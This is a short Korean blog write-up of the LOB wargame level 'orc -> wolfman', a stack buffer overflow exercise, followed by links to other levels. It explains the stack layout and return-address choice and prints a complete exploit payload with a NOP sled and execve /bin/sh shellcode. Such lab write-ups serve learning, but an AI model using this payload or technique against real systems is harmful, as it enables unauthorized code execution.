ii4gsp
LOB - Level5 [orc -> wolfman] 본문
이전 문제와 크게 달라진건 없다 하지만 맨 밑줄 buffer 40byte를 모두 0으로 초기화 해준다.
문제푸는 방식은 이전 문제와 동일하다.
이전의 스택구조와 동일하다
i
_____
buffer
______
SFP
______
RET
strcpy()호출 다음인 <main+194>에 break point를 걸어주고
0xbffffab4를 ret로 잡고 페이로드를 작성해주었다.
payload
./wolfman $(python -c 'print "\xbf" * 44 + "\xb4\xfa\xff\xbf" + "\x90" * 100 + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80"')'시스템 해킹 > LOB' 카테고리의 다른 글
| LOB - Level7 [darkelf -> orge] (0) | 2020.01.15 |
|---|---|
| LOB - Level6 [wolfman -> darkelf] (0) | 2020.01.14 |
| LOB - Level4 [goblin -> orc] (0) | 2020.01.14 |
| LOB - Level3 [cobolt -> goblin] (0) | 2020.01.13 |
| LOB - Level2 [gremlin -> cobolt] (0) | 2020.01.13 |
'시스템 해킹/LOB' Related Articles
more
Comments